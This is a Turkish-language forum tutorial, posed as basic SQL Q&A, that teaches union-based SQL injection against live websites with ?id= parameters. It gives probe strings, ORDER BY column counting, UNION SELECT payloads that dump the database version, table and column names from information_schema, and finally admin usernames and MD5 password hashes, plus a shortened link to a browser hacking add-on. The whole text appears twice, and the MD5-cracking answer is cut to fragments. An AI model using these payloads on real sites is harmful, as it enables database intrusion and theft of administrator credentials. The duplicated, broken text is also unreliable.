Sql Temel Sorular Ve Cevapları
1-Sql Nedir?
2-Sql açığı nasıl oluşur?
3-Sql açığı nerelerde aranır?
4-Sql açığı nasıl sorgulanır?
5-Kolon sayısı nasıl bulunur?
6-Kolonlar nasıl birleştirilir?
7-Version nasıl istenir?
8-Tablo isimleri nasıl görüntülenir?
9-Kolon isimleri nasıl görüntülenir?
10-DB’deki tablo isimleri nasıl görüntülenir?
11-Tablo isimleri nasıl HEX’lenir?
12-Tablo isimleri nasıl CHAR’lanır?
13-Admin username ve şifresi nasıl görüntülenir?
14-MD5 nedir?
15-MD5 nasıl kırılır?
16-Admin paneli nasıl bulunur?
1-Sql Nedir?
SQL (Structured Query Language) kendisi bir programlama dili olmamasına rağmen bir çok kişi tarafından programlama dili olarak bilinir. SQL herhangi bir veri tabanı ortamında kullanılan bir alt dildir. (sub language) SQL ile yalnızca veri tabanı üzerinde işlem yapabiliriz. SQL cümleceikleri kullanarak veri tabanına kayıt ekleyebilir, olan kayıtları değiştirebilir silebilir ve bu kayıtlardan listeler oluşturabiliriz. SQL cümlecikleri genellikle aynı olmakla birlikte farklı veri tabanı ortamlarında değişebilmektedir. Ayrıca veri tabanlarının kendilerine özgü sql komutlarıda vardır.
2-Sql açığı nasıl oluşur?
SQL açığının’ ın ana nedeni web uygulamasının kullanıcıdan gelen girdiyi doğru şekilde kontrol etmeden o girdi ile dinamik bir SQL cümleciği oluşturmasından kaynaklanmaktadır.
3-Sql açığı nerelerde aranır?
Sql açığı linux ve windows servere kurulu olan asp, php ve Google Seo düzgün kurulmamış html sitelerin id=23 gib değelerin olduğu sayfada aranır.
4-Sql açığı nasıl sorgulanır?
Sql açığı sitenin sonunda bulunan asp?id=23 php?id=23 id=23.html gibi uzantılara aşağıdaki kodların her hangi birisinin eklenmesi ile sorgulanır.
’
’a
’or’
-1
1=1
’or"1=1’
heavy 1=1
5-Kolon sayısı nasıl bulunur?
Kolon sayısı sitenin sonunda bulunan asp?id=23 php?id=23 id=23.html gibi uzantılara +order+by+10-- komutunun eklenmesi ile bulunur.Komutlar arasına ’+’ yada ’Boşluk’ konularak yazılabilir.+order+by+10-- eklediğimizde sayfa bozulmuyorsa kolan sayımız daha büyük demektir.Eğer ki bozuluyor ise kolon sayımız daha küçük demektir.Böyle bir hata verir ’Unknown column ’10’ in ’order clause’.Yani kolon sayımız bozulmadan bir öncekidir sayıyı bir artırdığımızda site bozulur.Bir üçüncü durum ise komutlarçalışmıyor ise ?id=-23+order+by+10-- ’sayı’ ile ’=’ arasına ’-’ konularak bypas edilir.
6-Kolonlar nasıl birleştirilir?
Kolonlar union+all+select+1,2,3,.....-- komutu ile birleştirilir.Bazen sayılar 0 dan başlatmamız gerekir.Örneğin kolon sayımız 8 ise ?id=-23+union+all+select+1,2,3,4,5,6,7,8-- yazmamız gerekir.Burada en önemli olan nokta komut girildikten sonra ekrana sayı yansımasıdır.
7-Version nasıl istenir?
Version bilgisi bir çok komut ile istene bilir version() @@version unhex(hex(@@version)) örnek olarak gösterilebilir.Şimdi bir örnek gösterelim.?id=-23+union+all+select+1,2,version(),4,5,6,7,8-- .Burada en önemli olan nokta ise kolonlar birleştirildikten sonra ekrana yansıyan rakamın yerine komutun yazılmasıdır.
8-Tablo isimleri nasıl görüntülenir?
Tablo isimleri ?id=-23+union+all+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables-- komutu ile öğranilir.
9-Kolon isimleri nasıl görüntülenir?
Tablo isimleri ?id=-23+union+all+select+1,2,group_concat(column_name),4,5,6,7,8+from+information_schema.columns-- komutu ile öğranilir.
10-DB’deki tablo isimleri nasıl görüntülenir?
DB’deki tablo isimleri ?id=-23+union+all+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.columns+where+table_schema=database()-- komutu ile öğranilir.
11-Tablo isimleri nasıl HEX’lenir?
DB’deki bir tablo ismi seçilir ve String to ASCII chart, ASCII to decimal convertor, String to decimal converter, string hexadecimal / hex conversion adresinden hexlenir.Örneğin admin olsun ’61 64 6D 69 6E’ bölebir sayı verdi.Biz sayıyı 0x kyarak 0x61646D696E şekline getiririz ve ?id=-23+union+all+select+1,2,group_concat(column_name),4,5,6,7,8+from+information_schema.columns+where+table_name=0x61646D696E komutu ile DB’deki bir tablonun kolonlarını göstermiş oluruz.
12-Tablo isimleri nasıl CHAR’lanır?
[url]https://tik.lat/udLXS adresinden mozilla için hackbar ı indirir ve kurarsınız.Tablo ismini Mysql char olarak charlarsınız ve karşınıza böyle birşey çıkar CHAR(97, 100, 109, 105, 110).Biz bunu ?id=-23+union+all+select+1,2,group_concat(column_name),4,5,6,7,8+from+information_schema.columns+where+table_name=CHAR(97, 100, 109, 105, 110) komutu ile DB’deki bir tablonun kolonlarını göstermiş oluruz.Bazende hiç birşey yapmadan tablo ismin yazsakda olur.Örnek ?id=-23+union+all+select+1,2,group_concat(column_name),4,5,6,7,8+from+information_schema.columns+where+table_name=’admin’
13-Admin username ve şifresi nasıl görüntülenir?
Yukarıdaki anlatılanlar gibi yaptıysanız eğer yazmış olduğunuz tablonun kolonları ekrana yansıyacaktır ve sizde istediğiniz kolonları gösterebilirsiniz.Örnek ?id=-23+union+all+select+1,2,group_concat(Username,0x3a,Password,0x3a),4,5,6,7,8+from+0x61646D696E komutu nu yazdığınızda admin usarname ve password u ekrana md5 olarak yansır bazen de şifre normal olarak görüntülenebilir.Bu arada 0x3a nın anlamı ’:’ username ve şifresini birbirindan ayırmak için kullanırız.
14-MD5 nedir?
MD5 (Message-Digest algorithm 5), veri bütünlüğünü test etmek için kullanılan, bir şifreleme algoritmasıdır. Bu algoritma girdinin büyüklüğünden bağımsız olarak 128-bit’lik bir çıktı üretir ve girdideki en ufak bir bit değişikliği bile çıktının tamamen değişmesine sebep olur.Yani kısacası bir verinin db deki şifrelenmiş halidir.
15-MD5 nasıl kırılır?
MD5 - . - MD5, SHA1, MySQL
1-Sql Nedir?
2-Sql açığı nasıl oluşur?
3-Sql açığı nerelerde aranır?
4-Sql açığı nasıl sorgulanır?
5-Kolon sayısı nasıl bulunur?
6-Kolonlar nasıl birleştirilir?
7-Version nasıl istenir?
8-Tablo isimleri nasıl görüntülenir?
9-Kolon isimleri nasıl görüntülenir?
10-DB’deki tablo isimleri nasıl görüntülenir?
11-Tablo isimleri nasıl HEX’lenir?
12-Tablo isimleri nasıl CHAR’lanır?
13-Admin username ve şifresi nasıl görüntülenir?
14-MD5 nedir?
15-MD5 nasıl kırılır?
16-Admin paneli nasıl bulunur?
1-Sql Nedir?
SQL (Structured Query Language) kendisi bir programlama dili olmamasına rağmen bir çok kişi tarafından programlama dili olarak bilinir. SQL herhangi bir veri tabanı ortamında kullanılan bir alt dildir. (sub language) SQL ile yalnızca veri tabanı üzerinde işlem yapabiliriz. SQL cümleceikleri kullanarak veri tabanına kayıt ekleyebilir, olan kayıtları değiştirebilir silebilir ve bu kayıtlardan listeler oluşturabiliriz. SQL cümlecikleri genellikle aynı olmakla birlikte farklı veri tabanı ortamlarında değişebilmektedir. Ayrıca veri tabanlarının kendilerine özgü sql komutlarıda vardır.
2-Sql açığı nasıl oluşur?
SQL açığının’ ın ana nedeni web uygulamasının kullanıcıdan gelen girdiyi doğru şekilde kontrol etmeden o girdi ile dinamik bir SQL cümleciği oluşturmasından kaynaklanmaktadır.
3-Sql açığı nerelerde aranır?
Sql açığı linux ve windows servere kurulu olan asp, php ve Google Seo düzgün kurulmamış html sitelerin id=23 gib değelerin olduğu sayfada aranır.
4-Sql açığı nasıl sorgulanır?
Sql açığı sitenin sonunda bulunan asp?id=23 php?id=23 id=23.html gibi uzantılara aşağıdaki kodların her hangi birisinin eklenmesi ile sorgulanır.
’
’a
’or’
-1
1=1
’or"1=1’
heavy 1=1
5-Kolon sayısı nasıl bulunur?
Kolon sayısı sitenin sonunda bulunan asp?id=23 php?id=23 id=23.html gibi uzantılara +order+by+10-- komutunun eklenmesi ile bulunur.Komutlar arasına ’+’ yada ’Boşluk’ konularak yazılabilir.+order+by+10-- eklediğimizde sayfa bozulmuyorsa kolan sayımız daha büyük demektir.Eğer ki bozuluyor ise kolon sayımız daha küçük demektir.Böyle bir hata verir ’Unknown column ’10’ in ’order clause’.Yani kolon sayımız bozulmadan bir öncekidir sayıyı bir artırdığımızda site bozulur.Bir üçüncü durum ise komutlarçalışmıyor ise ?id=-23+order+by+10-- ’sayı’ ile ’=’ arasına ’-’ konularak bypas edilir.
6-Kolonlar nasıl birleştirilir?
Kolonlar union+all+select+1,2,3,.....-- komutu ile birleştirilir.Bazen sayılar 0 dan başlatmamız gerekir.Örneğin kolon sayımız 8 ise ?id=-23+union+all+select+1,2,3,4,5,6,7,8-- yazmamız gerekir.Burada en önemli olan nokta komut girildikten sonra ekrana sayı yansımasıdır.
7-Version nasıl istenir?
Version bilgisi bir çok komut ile istene bilir version() @@version unhex(hex(@@version)) örnek olarak gösterilebilir.Şimdi bir örnek gösterelim.?id=-23+union+all+select+1,2,version(),4,5,6,7,8-- .Burada en önemli olan nokta ise kolonlar birleştirildikten sonra ekrana yansıyan rakamın yerine komutun yazılmasıdır.
8-Tablo isimleri nasıl görüntülenir?
Tablo isimleri ?id=-23+union+all+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables-- komutu ile öğranilir.
9-Kolon isimleri nasıl görüntülenir?
Tablo isimleri ?id=-23+union+all+select+1,2,group_concat(column_name),4,5,6,7,8+from+information_schema.columns-- komutu ile öğranilir.
10-DB’deki tablo isimleri nasıl görüntülenir?
DB’deki tablo isimleri ?id=-23+union+all+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.columns+where+table_schema=database()-- komutu ile öğranilir.
11-Tablo isimleri nasıl HEX’lenir?
DB’deki bir tablo ismi seçilir ve String to ASCII chart, ASCII to decimal convertor, String to decimal converter, string hexadecimal / hex conversion adresinden hexlenir.Örneğin admin olsun ’61 64 6D 69 6E’ bölebir sayı verdi.Biz sayıyı 0x kyarak 0x61646D696E şekline getiririz ve ?id=-23+union+all+select+1,2,group_concat(column_name),4,5,6,7,8+from+information_schema.columns+where+table_name=0x61646D696E komutu ile DB’deki bir tablonun kolonlarını göstermiş oluruz.
12-Tablo isimleri nasıl CHAR’lanır?
[url]https://tik.lat/udLXS adresinden mozilla için hackbar ı indirir ve kurarsınız.Tablo ismini Mysql char olarak charlarsınız ve karşınıza böyle birşey çıkar CHAR(97, 100, 109, 105, 110).Biz bunu ?id=-23+union+all+select+1,2,group_concat(column_name),4,5,6,7,8+from+information_schema.columns+where+table_name=CHAR(97, 100, 109, 105, 110) komutu ile DB’deki bir tablonun kolonlarını göstermiş oluruz.Bazende hiç birşey yapmadan tablo ismin yazsakda olur.Örnek ?id=-23+union+all+select+1,2,group_concat(column_name),4,5,6,7,8+from+information_schema.columns+where+table_name=’admin’
13-Admin username ve şifresi nasıl görüntülenir?
Yukarıdaki anlatılanlar gibi yaptıysanız eğer yazmış olduğunuz tablonun kolonları ekrana yansıyacaktır ve sizde istediğiniz kolonları gösterebilirsiniz.Örnek ?id=-23+union+all+select+1,2,group_concat(Username,0x3a,Password,0x3a),4,5,6,7,8+from+0x61646D696E komutu nu yazdığınızda admin usarname ve password u ekrana md5 olarak yansır bazen de şifre normal olarak görüntülenebilir.Bu arada 0x3a nın anlamı ’:’ username ve şifresini birbirindan ayırmak için kullanırız.
14-MD5 nedir?
MD5 (Message-Digest algorithm 5), veri bütünlüğünü test etmek için kullanılan, bir şifreleme algoritmasıdır. Bu algoritma girdinin büyüklüğünden bağımsız olarak 128-bit’lik bir çıktı üretir ve girdideki en ufak bir bit değişikliği bile çıktının tamamen değişmesine sebep olur.Yani kısacası bir verinin db deki şifrelenmiş halidir.
15-MD5 nasıl kırılır?
MD5 - . - MD5, SHA1, MySQL
Son düzenleme:
